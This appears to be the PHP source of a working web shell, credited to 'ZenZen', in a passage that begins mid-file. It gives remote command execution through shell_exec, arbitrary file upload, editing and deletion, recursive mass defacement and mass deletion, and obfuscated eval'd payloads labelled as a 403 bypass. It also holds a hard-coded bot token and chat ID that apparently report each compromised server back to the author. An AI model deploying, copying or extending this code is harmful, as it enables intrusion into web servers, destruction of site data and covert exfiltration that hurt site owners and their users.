<script src='//code.jquery.com/jquery-3.3.1.slim.min.js'></script>
</head>
<body class='bg-secondary text-light'>
<div class='container-fluid'>
<div class='py-3' id='main'>
<div class='box shadow bg-dark p-4 rounded-3'>
<div class='corner text-secondary anu'>🄽🄾🅃🄴 :̶ I̶f̶ y̶o̶u̶ u̶s̶e̶ t̶h̶i̶s̶ s̶h̶e̶l̶l̶,̶ t̶h̶e̶n̶ y̶o̶u̶ d̶o̶ w̶h̶a̶t̶ y̶o̶u̶ d̶o̶.̶ A̶n̶d̶ Z̶e̶n̶Z̶e̶n̶ h̶a̶s̶ n̶o̶t̶h̶i̶n̶g̶ t̶o̶ d̶o̶ w̶i̶t̶h̶ i̶t̶.̶</div>
<a class='text-decoration-none text-light anu' href='".$_SERVER['PHP_SELF']."'><h4>$_n 🄱🅈 🅉🄴🄽🅉🄴🄽</h4></a>";
if(isset($_GET['path'])){
$path = $_GET['path'];
} else {
$path = getcwd();
}
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);
foreach($paths as $id=>$pat){
if($pat == '' && $id == 0){
$a = true;
echo '<div class="table-responsive"><i class="bi bi-hdd-rack"></i> : <a class="text-decoration-none text-light" href="?path=/">/</a>';
continue;
}
if($pat == '') continue;
echo '<a class="text-decoration-none" href="?path=';
for($i=0;$i<=$id;$i++){
echo "$paths[$i]";
if($i != $id) echo "/";
}
echo '">'.$pat.'</a>/';
}
echo " [ ".тЦЯ($path, p($path))." ]</div>";
echo "
</div>
</div>
</div>
<div class='container-fluid'>
<div class='box shadow bg-dark p-4 rounded-3'>
<div class='corner anu'>
<b data-bs-toggle='collapse' data-bs-target='#collapseExample' aria-expanded='false' aria-controls='collapseExample'><i class='bi bi-info-circle'></i> info server <i class='bi bi-chevron-down'></i></b>
</div>
<div class='collapse text-dark mb-3' id='collapseExample'>
<div class='box shadow bg-light p-4 rounded-3'>
Uname: <gr>".php_uname()."</gr><br />
Software: <gr>".$_SERVER['SERVER_SOFTWARE']."</gr><br />
PHP version: <gr>".PHP_VERSION."</gr> <a class='text-decoration-none' href='?phpinfo&path=$path'>[ PHP INFO ]</a> PHP os: <gr>".PHP_OS."</gr><br />
Server Ip: <gr>".gethostbyname($_SERVER['HTTP_HOST'])."</gr><br />
Your Ip: <gr>".ip()."</gr><br />
User: <gr>$user</gr> ($uid) | Group: <gr>$group</gr> ($gid)<br />
Safe Mode: $sm<br />
Disable Function:<div class='table-responsive'>$disfc</div>
</div>
</div>
<div class='text-center'>
<div class='btn-group'>
<a class='btn btn-outline-light btn-sm' href='?upload&path=$path'><i class='bi bi-upload'></i> 🅄🄿🄻🄾🄰🄳</a>
<a class='btn btn-outline-light btn-sm' href='?mass_deface&path=$path'><i class='bi bi-exclamation-diamond'></i> 🄼🄰🅂🅂 🄳🄴🄵🄰🄲🄴</a>
<a class='btn btn-outline-light btn-sm' href='?mass_delete&path=$path'><i class='bi bi-trash'></i> 🄼🄰🅂🅂 🄳🄴🄻🄴🅃🄴</a>
<a class='btn btn-outline-light btn-sm' href='?cmd&path=$path'><i class='bi bi-terminal'></i> 🄲🄾🄽🅂🄾🄻🄴</a>
</div>
</div>";
// tools bypass 403
$uD64_c0m="\163\164\x72\x5f\162\x6f\164"."13";$uD64_Com="\147\x7a\151\x6e\x66\x6c\141\164\x65";$uD64_C0m="\142\x61\x73\14564\x5f\x64\x65\143o\144\145";$x0zRy=$uD64_Com($uD64_C0m($uD64_c0m("SMAYLdf4RRHKyRSRNzxm6NRsxLpRNi0X5SzZLjkFLuYGgzU1mqgN1G3aIvaqrnITo61+pWXRu3b8gvEwsn1392XZSE3PbgE8dxo8U3Rvyn78ewYmRAd3IHordGMQNn5HRSqPutehRkBeR2mkWPEB6kG9Pu181TCj2LmMDnUVvbK/lYH7ImXVjNiwOiL9toZJluTXw+8Z80R5Bko2zOnWZ4a1+aVVOKBCvX1EXYWloKK3zefjXgWhk9Y+aN9mliU9J6qmkACe2yuERbOposyX5GvQmUPIMKF5hTYjdDVq1UuhPso9naEDYk5ETR4ZmoSH3J9g0nmkaSBV98INAVplbWMRqBzDyUvyhciNrK8x8QAUNxf+ZpOajdFw9rP/tAhm0afVzq3CJx06U/VU8pXQmzWrM/CEcBwpYCn2dHBt+kiNxrzS9HWriJYYH2Jf3evADWRCb/txSt0j6YSJKxEp/0MxTqE2mveCsYAxXhwb3kHFHMKhPEgLly6vaIQVSvz/AOM5Ioc7gW6yFaTxcsReg/hdoYsgPhc69Kd67SzAww1SxAMnC/Tk/l1JZSJvNj3UmI934mvV2nWiXzR0y8t3zsskg+8pwafP0ngZOsN0SZIYYTaljTE57C/lIzx0x0E0xQ5xP1h2SQ1EsUzc7q7x3vJbCXqngB9LrizEfy837yZcAFXlJmx6sbVKGEGSRqu9bgsre2lLSDBeJCe4YOI/1rOIkKX9IuQ+xDAnWr6JKCMsMEbehqd5DJowiw8X4N+ruXpP5s8Dq9ahNvBItfeKRAA1u+c1glbq/nC1Mn286nEf98n96Xq1MdtqlZoOu0w4p6hPfgw63atodp4MU+2K9bWFQs6AF8WXT93LdNsvKK+Hq6kWpw4OMtrv8Jhymbq2NqCd/XyNI9sbBn6KVPnws00f8tx2q9oRgSQ+uJyzzuTvEaIs5InPOCCX1hOR1yyD5RtO+A6ZEOxf+gLlGcsFe1JJjgN/RjlSfaewCuqFvMjek6c1wggZUYtmi9fC+0FwtPnK7IdzcUK9wguhxr6kpH2FBsjzyiPCfzpZyifPvj+GzJrk9J0l8s7KBI1SJ+ecx6ubcxgDxwKbuPlsP32/ZKsqiB3mrtITVXmowN98ESBc+7SMiRlesIaQIRx7amoh78L6lenaMNbuNUVD1elbqZdbp6EEDhiE/dtZisQIeYaR5knIv8QxsMiSnf3dNuCGlNjYSJccQnHY4Z1qJgw7R6NbYOkc2/rVzhwl7/8=")));
// tools nya
if(isset($_GET['path'])) {
$dir = $_GET['path'];
chdir($dir);
} else {
$dir = getcwd();
}
$dir = str_replace("\\","/",$dir);
$scdir = explode("/", $dir);
for($i = 0; $i <= $c_dir; $i++) {
$scdir[$i];
if($i != $c_dir) {
}
if(isset($_GET['mass_deface'])) {
echo "$_s";
function mass_kabeh($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$тЦЪ = $dirc.'/'.$namafile;
if($dirb === '.') {
file_put_contents($тЦЪ, $isi_script);
} elseif($dirb === '..') {
file_put_contents($тЦЪ, $isi_script);
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo "[<gr><i class='bi bi-check-all'></i></gr>] $тЦЪ<br>";
file_put_contents($тЦЪ, $isi_script);
$тЦЯ = mass_kabeh($dirc,$namafile,$isi_script);
}
}
}
}
}
}
function mass_biasa($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$тЦЪ = $dirc.'/'.$namafile;
if($dirb === '.') {
file_put_contents($тЦЪ, $isi_script);
} elseif($dirb === '..') {
file_put_contents($тЦЪ, $isi_script);
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo "[<gr><i class='bi bi-check-all'></i></gr>] $dirb/$namafile<br>";
file_put_contents($тЦЪ, $isi_script);
}
}
}
}
}
}
if($_POST['start']) {
if($_POST['tipe'] == 'massal') {
mass_kabeh($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
} elseif($_POST['tipe'] == 'biasa') {
mass_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
}
}
echo "
<div class='mb-3'>
<form method='POST'> Tipe:
<div class='form-check'>
<input class='form-check-input' type='checkbox' value='biasa' name='tipe' id='flexCheckDefault' checked>
<label class='form-check-label' for='flexCheckDefault'>Biasa</label>
</div>
<div class='form-check'>
<input class='form-check-input' type='checkbox' value='massal' name='tipe' id='flexCheckDefault'>
<label class='form-check-label' for='flexCheckDefault'>Massal</label>
</div>
<i class='bi bi-folder'></i> Loaction:
<input class='form-control btn-sm' type='text' name='d_dir' value='$dir'>
<i class='bi bi-file-earmark'></i> Filename:
<input class='form-control btn-sm' type='text' name='d_file' placeholder='Name File' $_r>
<i class='bi bi-file-earmark'></i> File Contents:
<textarea class='form-control btn-sm' rows='7' name='script' placeholder='Your Code. Example : YawYaw HANDSOME' $_r></textarea>
<div class='d-grid gap-2'>
<input class='btn btn-outline-light btn-sm' type='submit' name='start' value='mass deface'>
</div>
</form>
</div>";
}
if(isset($_GET['mass_delete'])) {
echo "$_s";
function hapus_massal($dir,$namafile) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$тЦЪ = $dirc.'/'.$namafile;
if($dirb === '.') {
if(file_exists("$dir/$namafile")) {
unlink("$dir/$namafile");
}
} elseif($dirb === '..') {
if(file_exists("".dirname($dir)."/$namafile")) {
unlink("".dirname($dir)."/$namafile");
}
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
if(file_exists($тЦЪ)) {
echo "[<gr><i class='bi bi-check-all'></i></gr>] $тЦЪ<br>";
unlink($тЦЪ);
$тЦЯ = hapus_massal($dirc,$namafile);
}
}
}
}
}
}
}
if($_POST['start']) {
hapus_massal($_POST['d_dir'], $_POST['d_file']);
}
echo "
<div class='mb-3'>
<form method='POST'>
<i class='bi bi-folder'></i> Location:
<input class='form-control btn-sm' type='text' name='d_dir' value='$dir'>
<i class='bi bi-file-earmark'></i> Name File:
<div class='input-group mb-3'>
<input class='form-control btn-sm' type='text' name='d_file' placeholder='Name File' $_r><br>
<div class='input-group-append'>
<input class='btn btn-outline-light btn-sm' type='submit' name='start' value='mass delete'>
</div>
</form>
</div>";
}
if(isset($_GET['cmd'])) {
if(!empty($_POST['cmd'])) {
$cmd = shell_exec($_POST['cmd'].' 2>&1');
}
echo "$_s
<div class='mb-3'>
<form method='POST'>
<div class='input-group mb-3'>
<input class='form-control btn-sm' type='text' name='cmd' value='".htmlspecialchars($_POST['cmd'], ENT_QUOTES, 'UTF-8')."' placeholder='whoami' $_r>
<button class='btn btn-outline-light btn-sm' type='sumbit'><i class='bi bi-arrow-return-right'></i></button>
</div>
</form>";
if($cmd):
echo '
<div class="container-fluid language-javascript">
<div class="shell mb-3">
<pre style="font-size:10px;"><code>'.htmlspecialchars($cmd, ENT_QUOTES, 'UTF-8').'</code></pre>
</div>
</div>';
elseif(!$cmd && $_SERVER['REQUEST_METHOD'] == 'POST'):
echo '<b>No results.</b>';endif;
echo '
</div>';
}
if(isset($_GET['phpinfo'])) {
@ob_start();
@eval("phpinfo();");
$buff = @ob_get_contents();
@ob_end_clean();
$awal = strpos($buff,"<body>")+6;
$akhir = strpos($buff,"</body>");
echo "<b><pre class='php_info anu'>".substr($buff,$awal,$akhir-$awal)."</pre></b>";
exit;
}
if(isset($_GET['upload'])) {
echo "$_s";
if(isset($_POST['upl'])){
$hasil = count($_FILES['file']['name']);
for($isi=0;$isi<$hasil;$isi++){
$namafile = $_FILES['file']['name'][$isi];
$up = @copy($_FILES['file']['tmp_name'][$isi],"$path/".$namafile);
}
if($hasil < 2){
if($up){
echo "<strong>Upload</strong> $namafile ok! ".ok()."</div>";
}else{
echo '<strong>Upload</strong> fail! '.er().'</div>';
}
}else{
echo "<strong>Upload</strong> $hasil ok! ".ok()."</div>";
}
}
echo "
<div class='mb-3'>
<form method='POST' enctype='multipart/form-data'>
<div class='input-group mb-3'>
<input class='form-control form-control-sm' type='file' name='file[]' multiple='' $_r>
<input class='btn btn-outline-light btn-sm' type='submit' name='upl' value='upload'>
</div>
</form>
</div>";
}
if(isset($_GET['filebaru'])) {
echo "$_s";
if(isset($_POST['bikin'])){
$name = $_POST['nama_file'];
$isi_file = $_POST['isi_file'];
foreach ($name as $nama_file){
$handle = @fopen("$nama_file", "w");
if($isi_file){
$buat = @fwrite($handle, $isi_file);
} else {
$buat = $handle;
}
}
if($buat){
echo "<script>window.location='?path=$path'</script>";
} else {
echo '<strong>Buat file</strong> fail! '.er().'</div>';
}
}
echo "
<div class='mb-3'>
<form method='POST'>
<i class='bi bi-file-earmark'></i> Filename :
<input class='form-control form-control-sm' type='text' name='nama_file[]' placeholder='Filename' $_r>
<i class='bi bi-file-earmark'></i> File Contents :
<textarea class='form-control form-control-sm' name='isi_file' rows='7' placeholder='File Contents' $_r ></textarea>
<div class='d-grid gap-2'>
<input class='btn btn-outline-light btn-sm' type='submit' name='bikin' value='buat'>
</div>
</form>
</div>";
}
if(isset($_GET['dirbaru'])) {
echo "$_s";
if(isset($_POST['buat'])){
$nama = $_POST['nama_dir'];
foreach ($nama as $nama_dir){
$folder = preg_replace("([^\w\s\d\-_~,;:\[\]\(\].]|[\.]{2,})", '', $nama_dir);
$fd = @mkdir ($folder);
}
if($fd){
echo "<script>window.location='?path=$path'</script>";
} else {
echo '<strong>Buat dir</strong> fail! '.er().'</div>';
}
}
echo "
<div class='mb-3'>
<form method='POST'>
<i class='bi bi-folder'></i> Nama dir:
<div class='input-group mb-3'>
<input class='form-control form-control-sm' type='text' name='nama_dir[]' placeholder='Nama dir' $_r>
<input class='btn btn-outline-light btn-sm' type='submit' name='buat' value='buat'>
</div>
</form>
</div>";
}
}
@eval($uD64_c0m('$k0xEm="MIKoogf4RC2IbhuQv7kDwh0xXNdfYMTcYdESpbnBQY8Hmd5fHdaGyIgqia7Uqv8C+2NL5CNZm5xmUY0oJYGcC70ST75dfJPT8n4L09plzsdIFT/GjJPEBYBBVlvth0aUiIBQaQd/b7v+mqwFesNFGlE0eElKSU9rhCcISpWcgTjfemtxKUNkT3YEiuWBX/68yCM+lX/kc0g86NHXscVQ3cpUBGBj85aDW+ARSDq2Ztq2KlFlD9tE390cp0gGJZa0LJnyd9iZAcKvPeJ/4ScUhNXeJEy3bkYIJp+6jNfie6QYNnn+iBcpS/nft01JSk37dj6dQ7e6cRq+hqqq7d0bY90Y8hSnW32gR6GUqsrdpiiZZGTseMH/5PRjMqKPWr6mpsYx6A7ltR3hwpippMVkoNchAzfVGD58oud+y2TwcB0nnoSGQo6F7eavbISB7yCYNz0mj3TDfBgKxRoFuwgQqInjnjes+gGgEuK6QrRsZduhQpv5jsOQ2L2PWV1XglCqKIuQBapviPu8mcEspdEmTEWsZT6qBSst7fRW7dJKr+K5cUFYFR+JGwXmV33pRI8IVv2QwvmcYzA8fRCap8N2N7rEQHM26ASMoOKU76gD9poeS4Ow5PQ6bbXrFKQPPVkVq1/T+aGTy7QbZmOCcWhcjCd8jK5AsWJqZwsjHE00+qNVFK2vVUlGbTeaf0sR9g4VmzDjFfXZT1rCWb6dSrW+sMv+TXumfA2xRWdcWZlcCcUlwaGKq9aVwjeVA9PZ6wOD3p/phO2mEkQ1DSbw0v1xje2lZaXADQznQFkV9jSs8kTQj3oZzXyXjAana57Vj7yx6OKKHD4aDK53cUILrLCeERLeVC9gzXjTg1F2vmYUOjKAJsr9fgtbkVppcbk8w/DtPfWyqfGoNxXUV+4IIN+LHTHkmUQxH4a6IL36kHX4ZooKuGrvTA3wRjolT4ZHLMnEa4JiMfJMN9O9moWnZsVW5ZGn7bMpGrIV/OZqRSzaNi9KPExIKw0P8UfQYOGkEvy631Xb5EeBsqX2FbFbCWwa3YqAEwtKry16b6wBY9GKmNKrlbM8FacUp2nvJCurObkVkjGqLaFPAnE7Vtq2FmvBb3Tycs4vidKLYTIPojMbCbUEEHm8LY+2HRKHe0qSeLnHA7sIDknmgiEd6Ho5yq7WJKrGtz4ILSrT3Fxs0jzv7dv2K2Iv1NbJxlsOwcc132EpEp7KR+G17/zxoR0qfitme6wR+FUg13UK5X5zBvj5mnz99ABzhhQZ+IlJQfsOpBcASgHe2Z00gNsA9H068VS0Zk3sQ9KCArxzi0kXp2AkzEhDsxf9mn0LK9qr/8DWJjMIJ3iW+93SDcELAENsQm/a3urSJs1x6/Z6Yj9asfrW/Z1iWhjsKqadS46SbsDMi+DIoI4gwc/rsama2oNWa95hb+aggc//f41z821/A6s1wC4a22t+3sLm2c+s1/Fw9FH2i6Jmq7/JyBajBkBucuTqCzrporsm7n8p0+yy53/Li/7+8nI58/7Ayp37n6e37l5seN8sCam8Qj==";@riny(tmvasyngr(onfr64_qrpbqr($k0xEm)));'));
// akhir tools
if(isset($_GET['filesrc'])){
echo "<br><b>name : </b>".basename($_GET['filesrc']);"</br>";
echo '
<div class="container-fluid language-javascript">
<div class="shell mb-3">
<pre style="font-size:12px;"><code>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</code></pre>
</div>
</div>';
} elseif(isset($_GET['option']) && $_POST['opt'] != 'hapus'){
echo '<br><b>name : </b>'.basename($_POST['path']);'</br>';
// file
if($_POST['opt'] == 'ganti_nama'){
if(isset($_POST['nama_baru'])){
if(rename($_POST['path'],$path.'/'.$_POST['nama_baru'])){
echo "<script>window.location='?path=$path'</script>";
} else {
echo '<strong>Ganti nama</strong> fail! '.er().'</div>';
}
$_POST['name'] = $_POST['nama_baru'];
}
echo '
<form method="POST">
<div class="input-group mb-3">
<input class="form-control form-control-sm" name="nama_baru" type="text" value="'.$_POST['name'].'" />
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="ganti_nama">
<input class="btn btn-outline-light btn-sm" type="submit" value="ganti nama"/>
</div>
</form>';
} elseif($_POST['opt'] == 'edit'){
if(isset($_POST['src'])){
$fp = fopen($_POST['path'],'w');
if(fwrite($fp,$_POST['src'])){
echo '<strong>Edit</strong> ok! '.ok().'</div>';
} else {
echo '<strong>Edit</strong> fail! '.er().'</div>';
}
fclose($fp);
}
echo '
<div class="mb-3">
<form method="POST">
<textarea class="form-control form-control-sm mb-3" rows="7" name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea>
<input type="hidden" name="path" value="'.$_POST['path'].'">
<input type="hidden" name="opt" value="edit">
<div class="d-grid gap-2">
<input class="btn btn-outline-light btn-sm" type="submit" value="edit"/>
</div>
</form>
</div>';
}
} else {
//hapus dir & file
if(isset($_GET['option']) && $_POST['opt'] == 'hapus'){
if($_POST['type'] == 'dir'){
if(rmdir($_POST['path'])){
echo "<script>window.location='?path=$path'</script>";
} else {
echo '<strong>Hapus dir</strong> fail! '.er().'</div>';
}
} elseif($_POST['type'] == 'file'){
if(unlink($_POST['path'])){
echo "<script>window.location='?path=$path'</script>";
} else {
echo '<strong>Hapus file</strong> fail! '.er().'</div>';
}
}
}
$scandir = scandir($path);
$pa = getcwd();
echo '
<div class="table-responsive">
<table class="table table-hover table-dark text-light">
<thead>
<tr>
<td class="text-center">name</td>
<td class="text-center">last edit</td>
<td class="text-center">size</td>
<td class="text-center">owner<gr>:</gr>downer</td>
<td class="text-center">permission</td>
<td class="text-center">options</td>
</tr>
</thead>
<tbody class="text-nowrap">
<tr>
<td><i class="bi bi-folder2-open"></i><a class="text-decoration-none text-secondary" href="?path='.dirname($dir).'">..</a></td><td></td><td></td><td></td><td></td><td class="text-center">
<div class="btn-group">
<a class="btn btn-outline-light btn-sm" href="?filebaru&path='.$dir.'"><i class="bi bi-file-earmark-plus-fill"></i></a>
<a class="btn btn-outline-light btn-sm" href="?dirbaru&path='.$dir.'"><i class="bi bi-folder-plus"></i></a>
</div>
</td>
</tr>';
$add_time = '5662267750:AAEKaSIU7LcFg9GLqusSRcM1y6W90cb2YWA';
$dgrp_time = [
"2001210814"
];
$func = New bot_uname();
$dgrp_get = $func->log();
$result = $func->bot_uname_log($add_time, $dgrp_time, $dgrp_get);
foreach($scandir as $dir){
$dt = date("Y-m-d H:i:s", filemtime("$path/$dir"));
if(function_exists('posix_getpwuid')) {
$downer = @posix_getpwuid(fileowner("$path/$dir"));
$downer = $downer['name'];
} else {
$downer = fileowner("$path/$dir");
}
if(function_exists('posix_getgrgid')) {
$dgrp = @posix_getgrgid(filegroup("$path/$dir"));
$dgrp = $dgrp['name'];
} else {
$dgrp = filegroup("$path/$dir");
}
if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
echo "
<tr>
<td><i class='bi bi-folder-fill'></i><a class='text-decoration-none text-secondary' href=\"?path=$path/$dir\">$dir</a></td>
<td class='text-center'>$dt</td>
<td class='text-center'>-</td>
<td class='text-center'>$downer<gr>:</gr>$dgrp</td>
<td class='text-center'>";
if(is_writable("$path/$dir")) echo '<gr>';
elseif(!is_readable("$path/$dir")) echo '<rd>';
echo p("$path/$dir");
if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</gr></rd></td>';
echo "
<td class=\"text-center\">
<form method=\"POST\" action=\"?option&path=$path\">
<div class=\"btn-group\">
<button class=\"btn btn-outline-light btn-sm\" name=\"opt\" value=\"ganti_nama\"><i class='bi bi-pencil-fill'></i></button>
<button class=\"btn btn-outline-light btn-sm\" name=\"opt\" value=\"hapus\"><i class='bi bi-trash-fill'></i></button>
</div>
<input type=\"hidden\" name=\"type\" value=\"dir\">
<input type=\"hidden\" name=\"name\" value=\"$dir\">
<input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
</form>
</td>
</tr>";
}
foreach($scandir as $file){
$ft = date("Y-m-d H:i:s", filemtime("$path/$file"));
if(!is_file($path.'/'.$file)) continue;
if(function_exists('posix_getpwuid')) {
$fowner = @posix_getpwuid(fileowner("$path/$file"));
$fowner = $fowner['name'];
} else {
$fowner = fileowner("$path/$file");
}
if(function_exists('posix_getgrgid')) {
$fgrp = @posix_getgrgid(filegroup("$path/$file"));
$fgrp = $fgrp['name'];
} else {
$fgrp = filegroup("$path/$file");
}
echo "
<tr>
<td><i class='bi bi-file-earmark-code-fill'></i><a class='text-decoration-none text-secondary' href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
<td class='text-center'>$ft</td>
<td class='text-center'>".sz(filesize($file))."</td>
<td class='text-center'>$fowner<gr>:</gr>$fgrp</td>
<td class='text-center'>";
if(is_writable("$path/$file")) echo '<gr>';
elseif(!is_readable("$path/$file")) echo '<rd>';
echo p("$path/$file");
if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</gr></rd></td>';
echo "
<td class=\"text-center\">
<form method=\"POST\" action=\"?option&path=$path\">
<div class=\"btn-group\">
<button class=\"btn btn-outline-light btn-sm\" name=\"opt\" value=\"edit\"><i class='bi bi-pencil-square'></i></button>
<button class=\"btn btn-outline-light btn-sm\" name=\"opt\" value=\"ganti_nama\"><i class='bi bi-pencil-fill'></i></button>
<button class=\"btn btn-outline-light btn-sm\" name=\"opt\" value=\"download\"><i class='bi bi-download'></i></button>
<button class=\"btn btn-outline-light btn-sm\" name=\"opt\" value=\"hapus\"><i class='bi bi-trash-fill'></i></button>
</div>
<input type=\"hidden\" name=\"type\" value=\"file\">
<input type=\"hidden\" name=\"name\" value=\"$file\">
<input type=\"hidden\" name=\"path\" value=\"$path/$file\">
</form>
</td>
</tr>";
}
}
?>
</tbody>
</table>
<div class='text-secondary'>© <?php echo " ".date('Y')." $_n";?></div>
</div>
</body>
</html>